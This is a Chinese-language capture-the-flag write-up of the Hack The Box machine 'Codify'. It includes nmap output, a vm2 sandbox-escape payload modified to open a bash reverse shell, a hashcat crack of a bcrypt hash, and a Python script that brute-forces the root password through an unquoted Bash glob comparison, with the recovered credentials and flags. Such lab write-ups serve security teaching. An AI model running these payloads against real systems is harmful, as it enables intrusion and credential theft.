Hack The Box:CODIFY writeup
NMAP
`PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_ 256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to `[`http://codify.htb/`](http://codify.htb/)`
|_http-server-header: Apache/2.4.52 (Ubuntu)
3000/tcp open http Node.js Express framework
|_http-title: Codify
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: codify.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel`
`TRACEROUTE (using port 3000/tcp)
HOP RTT ADDRESS
1 39.94 ms ip-10-10-14-1.ap-east-1.compute.internal (10.10.14.1)
2 40.05 ms ip-10-10-11-239.ap-east-1.compute.internal (10.10.11.239)`
vm2 bypass
先把hosts改成codify.htb,进去发现是个node.js的在线运行环境,带沙箱
在copyright处发现沙箱基于vm2
Sandbox Bypass in vm2 | CVE-2023-32314 | Snyk
const { VM } = require("vm2");
const vm = new VM();
const code = `
const err = new Error();
err.name = {
toString: new Proxy(() => "", {
apply(target, thiz, args) {
const process = args.constructor.constructor("return process")();
throw process.mainModule.require("child_process").execSync("echo hacked").toString();
},
}),
};
try {
err.stack;
} catch (stdout) {
stdout;
}
`;
console.log(vm.run(code)); // -> hacked
修改过的payload:
const { VM } = require("vm2");
const vm = new VM();
const code = `
const err = new Error();
err.name = {
toString: new Proxy(() => "", {
apply(target, thiz, args) {
const process = args.constructor.constructor("return process")();
throw process.mainModule.require("child_process").execSync(" bash -c 'bash -i >& /dev/tcp/10.10.14.63/4444 0>&1'").toString();
},
}),
};
try {
err.stack;
} catch (stdout) {
stdout;
}
`;
console.log(vm.run(code));
得到反弹shell
在/var/www/contact中,我们找到一个数据库文件:tickets.db
使用strings查看:
svc@codify:/var/www/contact$ strings tickets.db
strings tickets.db
SQLite format 3
otableticketstickets
CREATE TABLE tickets (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, topic TEXT, description TEXT, status TEXT)P
Ytablesqlite_sequencesqlite_sequence
CREATE TABLE sqlite_sequence(name,seq)
tableusersusers
CREATE TABLE users (
id INTEGER PRIMARY KEY AUTOINCREMENT,
username TEXT UNIQUE,
password TEXT
))
indexsqlite_autoindex_users_1users
joshua$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
joshua
users
tickets
Joe WilliamsLocal setup?I use this site lot of the time. Is it possible to set this up locally? Like instead of coming to this site, can I download this and set it up in my own computer? A feature like that would be nice.open
Tom HanksNeed networking modulesI think it would be better if you can implement a way to handle network-based stuff. Would help me out a lot. Thanks!open
获得用户joshua的hash:
joshua$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
用hashcat跑一下:
hashcat -m 3200 '$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2' /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
得到凭据:
joshua:spongebob1
ssh上去:
joshua@codify:~$ cat user.txt
fcac372e73c2e2b21c868a0c91e1d106
BASH 不安全的变量使用方法
sudo -l:
joshua@codify:~$ sudo -l
Matching Defaults entries for joshua on codify:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User joshua may run the following commands on codify:
(root) /opt/scripts/mysql-backup.sh
在opt/scripts下找到/mysql-backup.sh:
#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"
read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo
if [[ $DB_PASS == $USER_PASS ]]; then
/usr/bin/echo "Password confirmed!"
else
/usr/bin/echo "Password confirmation failed!"
exit 1
fi
/usr/bin/mkdir -p "$BACKUP_DIR"
databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")
for db in $databases; do
/usr/bin/echo "Backing up database: $db"
/usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done
/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'
我们注意到if [[ $DB_PASS == $USER_PASS ]];
,这种写法在bash中是十分不安全的写法
一个未加引号的变量将被视为武装炸弹:它在与空格和通配符接触时爆炸
运行该脚本时,我们输入*
作为标准输入,则if [[ $DB_PASS == $USER_PASS ]];
会变成* == $USER_PASS
,bash会使用通配符匹配,使条件为真
如果我们遍历所有可用的ASCII字符,如l*
,k*
,一旦他们符合匹配模式,那么表达式则会为真。
Reference:
shellharden/how_to_do_things_safely_in_bash.md at master · anordal/shellharden (github.com)
为此,我们可以编写脚本来爆破密码:
import string
import subprocess
all = list(string.ascii_letters + string.digits)
password = ""
flag = False
while not flag:
for ch in all:
command = f" echo {password}{ch}* | sudo /opt/scripts/mysql-backup.sh";
output = subprocess.run(command,shell=True,stderr=subprocess.PIPE,stdout=subprocess.PIPE,text=True).stdout;
if ("fail" in output ):
pass
else:
password+=ch
print(password)
break
else:
flag = True
print(password)
joshua@codify:~$ python3 scriptt.py
[sudo] password for joshua:
k
kl
klj
kljh
kljh1
kljh12
kljh12k
kljh12k3
kljh12k3j
kljh12k3jh
kljh12k3jha
kljh12k3jhas
kljh12k3jhask
kljh12k3jhaskj
kljh12k3jhaskjh
kljh12k3jhaskjh1
kljh12k3jhaskjh12
kljh12k3jhaskjh12k
kljh12k3jhaskjh12kj
kljh12k3jhaskjh12kjh
kljh12k3jhaskjh12kjh3
这就是root密码了:
joshua@codify:~$ su root
Password:
root@codify:/home/joshua# cat /root/root.txt
20d068a93d4e1bb8fa8aa6d384ca106e
root@codify:/home/joshua#